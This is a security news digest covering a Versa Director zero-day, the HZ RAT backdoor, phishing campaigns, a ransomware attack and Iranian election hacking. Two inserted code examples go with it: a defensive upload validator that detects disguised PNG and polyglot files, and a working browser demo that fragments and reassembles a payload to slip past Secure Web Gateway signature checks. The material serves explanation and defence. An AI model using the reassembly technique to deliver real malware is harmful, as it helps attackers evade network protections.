Chinese Volt Typhoon hackers exploited Versa zero-day to breach ISPs, MSPs

From bleepingcomputer.com

The Chinese state-backed hacking group Volt Typhoon is behind attacks that exploited a zero-day flaw in Versa Director to upload a custom webshell to steal credentials and breach corporate networks.

Versa Director is a management platform ISPs and MSPs use to manage virtual WAN connections created using SD-WAN services.

The vulnerability is tracked as CVE-2024-39717 and resides in a feature that lets admins upload custom icons to customize the Versa Director GUI. The flaw allowed threat actors who already held administrator privileges to upload malicious Java files disguised as PNG images, which could then be executed remotely.

In an advisory published yesterday, Versa says that Director versions 21.2.3, 22.1.2, and 22.1.3 are impacted by the flaw. Upgrading to the latest version, 22.1.4, will fix the vulnerability, and admins should review the vendor’s system hardening requirements and firewall guidelines.

Versa told BleepingComputer that it classifies this vulnerability as a privilege elevation flaw because it was used to harvest credentials from users who logged into the system. However, other types of malware could have been used to perform different kinds of malicious activity on the device.
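The mechanism above (a trusted extension, untrusted bytes) is straightforward to check for. What follows is an added example, not Versa's code: a content-based validator for an icon-upload endpoint, plus a small triage helper for responders who want to find icon files whose name says PNG but whose bytes do not. It runs under Node.js with no dependencies; the sample files are constructed inline for the demo, and the signatures it looks for (PNG, compiled Java class, ZIP/JAR, JSP markup) are the generic ones, not anything Versa-specific.

```javascript
// Added example (not Versa's code): validate an uploaded "icon" by its bytes,
// not by its filename or Content-Type. Runs under Node.js; no network access.
const PNG_MAGIC = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]);
const CLASS_MAGIC = Buffer.from([0xca, 0xfe, 0xba, 0xbe]); // compiled Java .class
const ZIP_LOCAL = Buffer.from("PK\x03\x04", "latin1");     // JAR/ZIP local file header
const ZIP_EOCD = Buffer.from("PK\x05\x06", "latin1");      // ZIP end-of-central-directory
const IEND = Buffer.from("IEND", "latin1");                // PNG terminal chunk type

// Classify a buffer by its leading bytes.
function sniffType(buf) {
  if (buf.length >= 8 && buf.subarray(0, 8).equals(PNG_MAGIC)) return "png";
  if (buf.length >= 4 && buf.subarray(0, 4).equals(CLASS_MAGIC)) return "java-class";
  if (buf.length >= 4 && buf.subarray(0, 4).equals(ZIP_LOCAL)) return "zip-or-jar";
  const head = buf.subarray(0, 512).toString("latin1");
  if (/<%@?\s*page|<%[\s=!]|<jsp:/i.test(head)) return "jsp";
  return "unknown";
}

// Accept only a plain PNG. Returns { ok, reason } so callers can act on the verdict.
function validateIconUpload(filename, buf) {
  if (!/\.png$/i.test(filename)) return { ok: false, reason: "extension must be .png" };
  const kind = sniffType(buf);
  if (kind !== "png") return { ok: false, reason: `content is ${kind}, not PNG` };
  // Polyglot check: the JVM locates a JAR's central directory from the END of the
  // file, so bytes that start with PNG magic can still be a loadable JAR if an
  // end-of-central-directory record appears anywhere later in the file.
  if (buf.indexOf(ZIP_EOCD) !== -1) return { ok: false, reason: "PNG/ZIP polyglot" };
  // A PNG ends with the IEND chunk: 4-byte length (0), "IEND", 4-byte CRC.
  // Anything after that CRC is trailing data and is rejected.
  const at = buf.lastIndexOf(IEND);
  if (at === -1 || at + 8 !== buf.length) return { ok: false, reason: "no terminal IEND chunk" };
  return { ok: true, reason: "png" };
}

// Triage helper for responders: given { filename: bytes } read from an icon
// directory, list files whose name claims PNG but whose bytes say otherwise.
function findDisguised(entries) {
  return Object.entries(entries)
    .filter(([name, buf]) => /\.png$/i.test(name) && !validateIconUpload(name, buf).ok)
    .map(([name, buf]) => `${name}: ${validateIconUpload(name, buf).reason}`);
}

// --- Constructed sample inputs (not real artefacts). The IHDR CRC is left as zeros
// because this validator does not verify chunk CRCs; a full PNG decoder would.
const SAMPLE_PNG = Buffer.concat([
  PNG_MAGIC,
  Buffer.from([0, 0, 0, 13]), Buffer.from("IHDR", "latin1"), Buffer.alloc(13), Buffer.alloc(4),
  Buffer.from([0, 0, 0, 0]), IEND, Buffer.from([0xae, 0x42, 0x60, 0x82]),
]);
const SAMPLE_CLASS = Buffer.concat([CLASS_MAGIC, Buffer.alloc(32)]);
const SAMPLE_JAR = Buffer.concat([
  ZIP_LOCAL, Buffer.alloc(26), Buffer.from("META-INF/MANIFEST.MF", "latin1"),
  ZIP_EOCD, Buffer.alloc(18),
]);
// PNG magic up front, ZIP directory record at the back: passes a magic-only check.
const SAMPLE_POLYGLOT = Buffer.concat([SAMPLE_PNG, ZIP_EOCD, Buffer.alloc(18)]);
const SAMPLE_JSP = Buffer.from('<%@ page language="java" %><%= "hello" %>', "latin1");

function demo() {
  return findDisguised({
    "logo.png": SAMPLE_PNG,
    "icon.png": SAMPLE_CLASS,
    "banner.png": SAMPLE_POLYGLOT,
    "notes.png": SAMPLE_JSP,
    "shell.jsp": SAMPLE_JSP, // wrong extension; caught by the upload check, not this filter
  });
}
```

The polyglot case is the one a magic-byte check alone misses: a file that is simultaneously a valid PNG and a valid JAR defeats "starts with 0x89PNG" and still loads in a JVM, which is why the validator also rejects any end-of-central-directory record and any bytes after IEND. None of this replaces the vendor patch; it is the kind of check an upload path should have had, and a quick way to triage an icon directory during response.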

Read more…

macOS Version of HZ RAT Backdoor Targets Chinese Messaging App Users

From thehackernews.com

Users of Chinese instant messaging apps like DingTalk and WeChat are the target of an Apple macOS version of a backdoor named HZ RAT.

The artifacts “almost exactly replicate the functionality of the Windows version of the backdoor and differ only in the payload, which is received in the form of shell scripts from the attackers’ server,” Kaspersky researcher Sergey Puzan said.

HZ RAT was first documented by German cybersecurity company DCSO in November 2022, with the malware distributed via self-extracting zip archives or malicious RTF documents presumably built using the Royal Road RTF weaponizer.

The attack chains involving RTF documents are engineered to deploy the Windows version of the malware that’s executed on the compromised host by exploiting a years-old Microsoft Office flaw in the Equation Editor (CVE-2017-11882).

Read more…

New QR Code Phishing Campaign Exploits Microsoft Sway to Steal Credentials

From thehackernews.com

Cybersecurity researchers are calling attention to a new QR code phishing (aka quishing) campaign that leverages Microsoft Sway infrastructure to host fake pages, once again highlighting the abuse of legitimate cloud offerings for malicious purposes.

“By using legitimate cloud applications, attackers provide credibility to victims, helping them to trust the content it serves,” Netskope Threat Labs researcher Jan Michael Alcantara said.

“Additionally, a victim uses their Microsoft 365 account that they’re already logged-into when they open a Sway page, that can help persuade them about its legitimacy as well. Sway can also be shared through either a link (URL link or visual link) or embedded on a website using an iframe.”

The attacks have primarily singled out users in Asia and North America, with technology, manufacturing, and finance being the most targeted sectors.

Microsoft Sway is a cloud-based tool for creating newsletters, presentations, and documentation. It has been part of the Microsoft 365 family of products since 2015.

Read more…

Be careful what you pwish for – Phishing in PWA applications

From welivesecurity.com

ESET analysts dissect a novel phishing method tailored to Android and iOS users.

[They] discovered a series of phishing campaigns targeting mobile users that used three different URL delivery mechanisms. These mechanisms include automated voice calls, SMS messages, and social media malvertising.

The voice call delivery is done via an automated call that warns the user about an out-of-date banking app and asks the user to select an option on the numerical keypad. After pressing the indicated button, a phishing URL is sent via SMS. This was reported in a tweet by Michal Bláha.

Initial delivery by SMS was performed by sending messages indiscriminately to Czech phone numbers. The message sent included a phishing link and text to socially engineer victims into visiting the link.

Read more…

Paris Olympics deals with ransomware attack

From scmagazine.com

A ransomware attack against the Paris Grand Palais exhibition hall, where Olympic events are being held, is being investigated.

According to MSN, a police investigation determined that the attackers targeted the institution’s central computer system, but the incident had not caused any disruption to Olympic events.

The computer system at the venue also handles data for 40 — mainly small — museums with which it is affiliated, the prosecutors said in an email.

Josh Jacobson, director of professional services at HackerOne, called the attack unsurprising — but potentially quite creative. He said the outcome of this successful compromise could benefit cybercriminals in a number of ways:

1) Because of the sheer number of venues that will be scrambling to get their operations up and running, the bad actors could be hoping to rake in ransoms across the victim pool and maximise financial gain.

Read more…

Secure Web Gateways are anything but as infosec hounds spot dozens of bypasses

From theregister.com

Defcon – Secure Web Gateways (SWGs) are an essential part of enterprise security, which makes it shocking to learn that every single SWG in the Gartner Magic Quadrant for SASE and SSE can reportedly be bypassed, allowing attackers to deliver malware without the gateways ever catching on.

Using a tactic he’s dubbed “last mile reassembly,” SquareX founder and long-time security researcher Vivek Ramachandran said he’s managed to suss out more than 25 different methods to bypass SWGs, all of which boil down to the same basic weakness: they miss a lot of what’s going on in modern web browsers.

“[SWGs] were invented almost 15, 17 years back [and] it all started as SSL intercepting proxies,” Ramachandran told us. “As cloud security became more important people built out this entire security stack in the cloud.

“This is really where the problem begins.”

SWGs, Ramachandran explains, mostly rely on inferring application-layer attacks from network traffic before it reaches a web browser. If the traffic isn’t recognizable as malicious on the wire, the SWG may not detect it and will deliver it to the user’s browser.
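To make concrete what “inferring from network traffic” misses, here is an added example (not SquareX’s or Ramachandran’s code) of the last-mile pattern in JavaScript: the server hands out base64 fragments, each too short to contain the byte pattern an inline gateway would match on, and the browser reassembles them and offers the result as a download through a Blob. The payload and the “signature” string are constructed for the demo and stand in for whatever a real gateway would key on; the fragmentation and reassembly functions also run under Node.js, where there is no DOM to trigger the download.

```javascript
// Added example (not SquareX's research code): minimal "last mile reassembly".
// The wire (and any inline SWG) only ever carries fragments; the file comes into
// existence inside the browser. SIGNATURE and PAYLOAD are constructed for the demo.
const SIGNATURE = "MALWARE-SIGNATURE-DEMO";
const PAYLOAD = `header\n${SIGNATURE}\nbody\n`;

// Sender side: split the bytes into fragments shorter than the pattern, so no
// single fragment can match it, and base64 each one so nothing on the wire
// looks like a file. Any per-response encoding would do; base64 keeps it simple.
function fragment(text, chunkSize) {
  if (chunkSize >= SIGNATURE.length) throw new Error("chunk must be shorter than the pattern");
  const bytes = Buffer.from(text, "utf8");
  const chunks = [];
  for (let i = 0; i < bytes.length; i += chunkSize) {
    chunks.push(bytes.subarray(i, i + chunkSize).toString("base64"));
  }
  return chunks;
}

// What a signature-matching gateway decides when it inspects ONE response,
// even if it is smart enough to base64-decode it: each fragment is clean.
function gatewayVerdict(chunkB64) {
  const decoded = Buffer.from(chunkB64, "base64").toString("latin1");
  return decoded.includes(SIGNATURE) ? "block" : "allow";
}

// Browser side: concatenate the decoded fragments. Returned as a string so the
// same function is testable under Node.js.
function reassemble(chunks) {
  return Buffer.concat(chunks.map((c) => Buffer.from(c, "base64"))).toString("utf8");
}

// Hand the reassembled bytes to the user as a file. This is the step that never
// crosses the network: the Blob and the object URL exist only inside the browser.
// Returns false under Node.js (no DOM), true once the click has been dispatched.
function deliverInBrowser(text, filename) {
  if (typeof document === "undefined") return false;
  const blob = new Blob([text], { type: "application/octet-stream" });
  const a = document.createElement("a");
  a.href = URL.createObjectURL(blob);
  a.download = filename;
  a.click();
  URL.revokeObjectURL(a.href);
  return true;
}

// End-to-end run: every fragment is allowed, yet the reassembled file matches.
function runDemo(chunkSize = 8) {
  const chunks = fragment(PAYLOAD, chunkSize);
  const verdicts = chunks.map(gatewayVerdict);
  const file = reassemble(chunks);
  return {
    fragments: chunks.length,
    anyBlocked: verdicts.includes("block"),
    fileMatches: file.includes(SIGNATURE),
    roundTripOk: file === PAYLOAD,
    delivered: deliverInBrowser(file, "reassembled.txt"),
  };
}
```

The point for defenders is where inspection happens: every fragment the gateway decodes is clean, and the file only exists once the browser concatenates them, so a signature or sandbox check has to run on the reassembled object (a browser-side download hook, or endpoint scanning of the file as it is written) rather than on the wire alone. Chunking is only one of the many variants the article counts; the same gap applies to anything the browser can construct from pieces, whether fetched over WebSockets, WebRTC, or pulled out of an image.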

Read more…

Microsoft researchers report Iran hackers targeting US officials before election

From reuters.com

WASHINGTON, Aug 9 (Reuters) – Microsoft researchers said on Friday that Iran government-tied hackers tried breaking into the account of a “high ranking official” on the U.S. presidential campaign in June, weeks after breaching the account of a county-level U.S. official.

The breaches were part of Iranian groups’ increasing attempts to influence the U.S. presidential election in November, the researchers said in a report that did not provide any further detail on the “official” in question.

The report follows recent statements by senior U.S. intelligence officials that they had seen Iran ramp up its use of clandestine social media accounts with the aim of sowing political discord in the United States.

Iran’s mission to the United Nations in New York told Reuters in a statement that its cyber capabilities were “defensive and proportionate to the threats it faces” and that it had no plans to launch cyber attacks. “The U.S. presidential election is an internal matter in which Iran does not interfere,” the mission added in response to the allegations in the Microsoft report.

Read more…